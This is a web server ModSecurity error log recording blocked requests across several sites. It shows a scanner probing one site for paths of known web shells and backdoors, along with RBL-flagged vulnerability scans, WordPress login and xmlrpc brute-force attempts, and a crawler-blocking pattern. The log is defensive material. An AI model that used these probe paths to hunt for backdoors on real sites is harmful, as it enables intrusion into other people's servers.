[Tue May 26 13:49:39.171923 2026] [security2:error] [pid 555743:tid 555951] [client 85.208.96.205:13498] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/basketball/list/"] [unique_id "ahVXm8jqAquC0YaxQjCx4AAAAVg"]
[Tue May 26 13:49:39.172055 2026] [security2:error] [pid 555743:tid 555951] [client 85.208.96.205:13498] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/basketball/list/"] [unique_id "ahVXm8jqAquC0YaxQjCx4AAAAVg"]
[Tue May 26 13:49:39.505527 2026] [security2:error] [pid 560287:tid 560432] [client 66.132.195.35:50226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.195.132.66.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "demo.azurmediatec.com"] [uri "/viewimage.php"] [unique_id "ahVXm5mX5s6sDS3wJVcPdQAAAJM"]
[Tue May 26 13:49:39.558812 2026] [security2:error] [pid 560287:tid 560437] [client 15.235.169.50:51978] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/classwithtostring.php"] [unique_id "ahVXm5mX5s6sDS3wJVcPeQAAAJg"]
[Tue May 26 13:49:39.648590 2026] [security2:error] [pid 560287:tid 560464] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXm5mX5s6sDS3wJVcPbAAAALE"]
[Tue May 26 13:49:40.022964 2026] [security2:error] [pid 560287:tid 560467] [client 15.235.169.50:52066] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/406"] [unique_id "ahVXnJmX5s6sDS3wJVcPgQAAALQ"]
[Tue May 26 13:49:40.481221 2026] [security2:error] [pid 555743:tid 555975] [client 15.235.169.50:52120] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/plugins/jquery.filer/uploads/jack2024.p.php"] [unique_id "ahVXnMjqAquC0YaxQjCx5wAAAXA"]
[Tue May 26 13:49:40.619115 2026] [security2:error] [pid 555743:tid 555876] [client 66.249.66.66:51495] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "jhonparra.com"] [uri "/index.php"] [unique_id "ahVXnMjqAquC0YaxQjCx7QAAAQ0"]
[Tue May 26 13:49:40.937592 2026] [security2:error] [pid 555743:tid 555882] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXnMjqAquC0YaxQjCx6QAAARM"]
[Tue May 26 13:49:40.956670 2026] [security2:error] [pid 560287:tid 560472] [client 15.235.169.50:52193] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/linkpreview/db.php"] [unique_id "ahVXnJmX5s6sDS3wJVcPlQAAALg"]
[Tue May 26 13:49:41.444403 2026] [security2:error] [pid 560287:tid 560425] [client 15.235.169.50:52265] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/install.php"] [unique_id "ahVXnZmX5s6sDS3wJVcPnQAAAIw"]
[Tue May 26 13:49:41.925014 2026] [security2:error] [pid 560287:tid 560432] [client 15.235.169.50:52337] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/autoload_classmap.php"] [unique_id "ahVXnZmX5s6sDS3wJVcPpwAAAJM"]
[Tue May 26 13:49:42.410015 2026] [security2:error] [pid 555743:tid 555929] [client 15.235.169.50:52403] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/theme-compat/wp-conflg.php"] [unique_id "ahVXnsjqAquC0YaxQjCyBAAAAUI"]
[Tue May 26 13:49:42.588502 2026] [security2:error] [pid 560287:tid 560532] [client 77.90.185.5:56939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.185.90.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "usteve.com"] [uri "/usteve-contact.php"] [unique_id "ahVXnpmX5s6sDS3wJVcPtQAAAPI"], referer: http://usteve.com/usteve-contact.php
[Tue May 26 13:49:42.882364 2026] [security2:error] [pid 560287:tid 560446] [client 15.235.169.50:52469] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/backup-backup/includes/"] [unique_id "ahVXnpmX5s6sDS3wJVcPxAAAAKA"]
[Tue May 26 13:49:43.344127 2026] [security2:error] [pid 555743:tid 555913] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXnsjqAquC0YaxQjCyBwAAATI"]
[Tue May 26 13:49:43.370712 2026] [security2:error] [pid 560287:tid 560471] [client 15.235.169.50:52541] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/network/amaxx.php"] [unique_id "ahVXn5mX5s6sDS3wJVcP0QAAALc"]
[Tue May 26 13:49:43.847027 2026] [security2:error] [pid 560287:tid 560544] [client 15.235.169.50:52627] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/repeater.php"] [unique_id "ahVXn5mX5s6sDS3wJVcP4gAAAPw"]
[Tue May 26 13:49:44.343105 2026] [security2:error] [pid 560287:tid 560531] [client 15.235.169.50:52712] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/1.php"] [unique_id "ahVXoJmX5s6sDS3wJVcP6wAAAPE"]
[Tue May 26 13:49:44.743540 2026] [security2:error] [pid 560287:tid 560414] [remote 74.7.242.7:52076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.242.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "algosoftware.bloggertarget.com"] [uri "/wp-content/plugins/pagelayer/js/givejs.php"] [unique_id "ahVXoJmX5s6sDS3wJVcP-wAAr30"], referer: https://algosoftware.bloggertarget.com/
[Tue May 26 13:49:44.810509 2026] [security2:error] [pid 560287:tid 560461] [client 15.235.169.50:52800] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/alfa-rex.php7"] [unique_id "ahVXoJmX5s6sDS3wJVcP_AAAAK4"]
[Tue May 26 13:49:45.059571 2026] [security2:error] [pid 560287:tid 560532] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXoJmX5s6sDS3wJVcP-gAAAPI"]
[Tue May 26 13:49:45.304233 2026] [security2:error] [pid 560287:tid 560547] [client 15.235.169.50:52886] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/fw.php"] [unique_id "ahVXoZmX5s6sDS3wJVcQBgAAAP8"]
[Tue May 26 13:49:45.757087 2026] [security2:error] [pid 560287:tid 560420] [client 208.91.198.85:32632] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXoZmX5s6sDS3wJVcQCAAAAIc"], referer: https://www.bloggertarget.com
[Tue May 26 13:49:45.807871 2026] [security2:error] [pid 560287:tid 560526] [client 15.235.169.50:53015] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/X.php"] [unique_id "ahVXoZmX5s6sDS3wJVcQDAAAAOw"]
[Tue May 26 13:49:45.926883 2026] [security2:error] [pid 560287:tid 560465] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXoZmX5s6sDS3wJVcQCwAAALI"], referer: https://www.bloggertarget.com
[Tue May 26 13:49:46.102153 2026] [security2:error] [pid 560287:tid 560407] [remote 121.200.216.55:54206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVXoZmX5s6sDS3wJVcQEQAA-nY"]
[Tue May 26 13:49:46.285164 2026] [security2:error] [pid 560287:tid 560425] [client 15.235.169.50:53081] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/wp-class.php"] [unique_id "ahVXopmX5s6sDS3wJVcQFQAAAIw"]
[Tue May 26 13:49:46.774735 2026] [security2:error] [pid 560287:tid 560475] [client 15.235.169.50:53191] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wso112233.php"] [unique_id "ahVXopmX5s6sDS3wJVcQHAAAALs"]
[Tue May 26 13:49:46.874407 2026] [security2:error] [pid 560287:tid 560528] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXopmX5s6sDS3wJVcQGwAAAO4"]
[Tue May 26 13:49:47.251670 2026] [security2:error] [pid 560287:tid 560444] [client 15.235.169.50:53292] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/images/wp-signup.php"] [unique_id "ahVXo5mX5s6sDS3wJVcQJwAAAJ4"]
[Tue May 26 13:49:47.721256 2026] [security2:error] [pid 560287:tid 560421] [client 15.235.169.50:53384] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/bypass.php"] [unique_id "ahVXo5mX5s6sDS3wJVcQMwAAAIg"]
[Tue May 26 13:49:48.196336 2026] [security2:error] [pid 560287:tid 560460] [client 15.235.169.50:53490] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/content.php"] [unique_id "ahVXpJmX5s6sDS3wJVcQPQAAAK0"]
[Tue May 26 13:49:48.642409 2026] [security2:error] [pid 555743:tid 555989] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXpMjqAquC0YaxQjCyMgAAAX4"]
[Tue May 26 13:49:48.687188 2026] [security2:error] [pid 560287:tid 560515] [client 15.235.169.50:53581] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/shell20211028.php"] [unique_id "ahVXpJmX5s6sDS3wJVcQRgAAAOE"]
[Tue May 26 13:49:48.796495 2026] [security2:error] [pid 555743:tid 555878] [client 129.222.147.134:44820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXpMjqAquC0YaxQjCyOQAAAQ8"]
[Tue May 26 13:49:48.799984 2026] [security2:error] [pid 555743:tid 555878] [client 129.222.147.134:44820] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXpMjqAquC0YaxQjCyOQAAAQ8"]
[Tue May 26 13:49:49.162078 2026] [security2:error] [pid 560287:tid 560473] [client 15.235.169.50:53648] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/xx.php"] [unique_id "ahVXpZmX5s6sDS3wJVcQSwAAALk"]
[Tue May 26 13:49:49.639862 2026] [security2:error] [pid 560287:tid 560480] [client 15.235.169.50:53728] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/seoo/wsoyanz.php"] [unique_id "ahVXpZmX5s6sDS3wJVcQWwAAAL8"]
[Tue May 26 13:49:49.666645 2026] [security2:error] [pid 555743:tid 555909] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXpcjqAquC0YaxQjCyPwAAAS4"]
[Tue May 26 13:49:50.098663 2026] [security2:error] [pid 560287:tid 560440] [client 15.235.169.50:53801] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/mari.php"] [unique_id "ahVXppmX5s6sDS3wJVcQZAAAAJs"]
[Tue May 26 13:49:50.582203 2026] [security2:error] [pid 560287:tid 560461] [client 15.235.169.50:53855] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/js/widgets/about.php7"] [unique_id "ahVXppmX5s6sDS3wJVcQaAAAAK4"]
[Tue May 26 13:49:51.059482 2026] [security2:error] [pid 555743:tid 555899] [client 15.235.169.50:53965] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/alfa.php"] [unique_id "ahVXp8jqAquC0YaxQjCyVQAAASQ"]
[Tue May 26 13:49:51.272889 2026] [security2:error] [pid 560287:tid 560486] [client 106.192.248.115:64068] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXp5mX5s6sDS3wJVcQdgAAAMU"]
[Tue May 26 13:49:51.273057 2026] [security2:error] [pid 560287:tid 560486] [client 106.192.248.115:64068] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXp5mX5s6sDS3wJVcQdgAAAMU"]
[Tue May 26 13:49:51.483772 2026] [security2:error] [pid 560287:tid 560290] [remote 45.79.189.31:20142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVXp5mX5s6sDS3wJVcQegAAoAI"]
[Tue May 26 13:49:51.544593 2026] [security2:error] [pid 560287:tid 560541] [client 15.235.169.50:54060] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/yanz.php"] [unique_id "ahVXp5mX5s6sDS3wJVcQfAAAAPk"]
[Tue May 26 13:49:52.011919 2026] [security2:error] [pid 555743:tid 555908] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXp8jqAquC0YaxQjCyXAAAAS0"]
[Tue May 26 13:49:52.017817 2026] [security2:error] [pid 555743:tid 555976] [client 15.235.169.50:54134] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/acme-challenge/1.php"] [unique_id "ahVXqMjqAquC0YaxQjCyYwAAAXE"]
[Tue May 26 13:49:52.507153 2026] [security2:error] [pid 555743:tid 555883] [client 15.235.169.50:54217] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/class.api.php"] [unique_id "ahVXqMjqAquC0YaxQjCybwAAARQ"]
[Tue May 26 13:49:52.999631 2026] [security2:error] [pid 555743:tid 555897] [client 15.235.169.50:54297] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/style2.php"] [unique_id "ahVXqMjqAquC0YaxQjCydwAAASI"]
[Tue May 26 13:49:53.473160 2026] [security2:error] [pid 555743:tid 555981] [client 15.235.169.50:54369] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/acme-challenge/cloud.php"] [unique_id "ahVXqcjqAquC0YaxQjCyhgAAAXY"]
[Tue May 26 13:49:53.753838 2026] [security2:error] [pid 560287:tid 560418] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXqZmX5s6sDS3wJVcQnAAAAIU"]
[Tue May 26 13:49:53.977739 2026] [security2:error] [pid 560287:tid 560477] [client 15.235.169.50:54456] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/mc.php"] [unique_id "ahVXqZmX5s6sDS3wJVcQpQAAAL0"]
[Tue May 26 13:49:54.461877 2026] [security2:error] [pid 555743:tid 555914] [client 15.235.169.50:54540] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/css/colors/light/about.php"] [unique_id "ahVXqsjqAquC0YaxQjCylAAAATM"]
[Tue May 26 13:49:54.966202 2026] [security2:error] [pid 555743:tid 555899] [client 15.235.169.50:54629] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/tinymce/skins/lightgray/img/index.php"] [unique_id "ahVXqsjqAquC0YaxQjCynAAAASQ"]
[Tue May 26 13:49:55.445966 2026] [security2:error] [pid 555743:tid 555890] [client 15.235.169.50:54706] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/bak.php"] [unique_id "ahVXq8jqAquC0YaxQjCyqgAAARs"]
[Tue May 26 13:49:55.689393 2026] [security2:error] [pid 555743:tid 555931] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXq8jqAquC0YaxQjCyowAAAUQ"]
[Tue May 26 13:49:55.927798 2026] [security2:error] [pid 555743:tid 555975] [client 15.235.169.50:54777] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/Text/about.php"] [unique_id "ahVXq8jqAquC0YaxQjCyuwAAAXA"]
[Tue May 26 13:49:56.409896 2026] [security2:error] [pid 560287:tid 560550] [client 15.235.169.50:54828] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/b.php"] [unique_id "ahVXrJmX5s6sDS3wJVcQzgAAAQI"]
[Tue May 26 13:49:56.891142 2026] [security2:error] [pid 555743:tid 555885] [client 15.235.169.50:54889] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/ss.php"] [unique_id "ahVXrMjqAquC0YaxQjCyzgAAARY"]
[Tue May 26 13:49:57.232538 2026] [security2:error] [pid 555743:tid 555944] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXrMjqAquC0YaxQjCyywAAAVE"]
[Tue May 26 13:49:57.390178 2026] [security2:error] [pid 555743:tid 555982] [client 15.235.169.50:54965] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/plugins/instabuilder2/cache/plugins/moon.php"] [unique_id "ahVXrcjqAquC0YaxQjCy2wAAAXc"]
[Tue May 26 13:49:57.868087 2026] [security2:error] [pid 555743:tid 555976] [client 15.235.169.50:55069] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/index1.php"] [unique_id "ahVXrcjqAquC0YaxQjCy6AAAAXE"]
[Tue May 26 13:49:58.022615 2026] [security2:error] [pid 555743:tid 555898] [client 106.192.248.115:64331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXrsjqAquC0YaxQjCy6wAAASM"]
[Tue May 26 13:49:58.022802 2026] [security2:error] [pid 555743:tid 555898] [client 106.192.248.115:64331] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXrsjqAquC0YaxQjCy6wAAASM"]
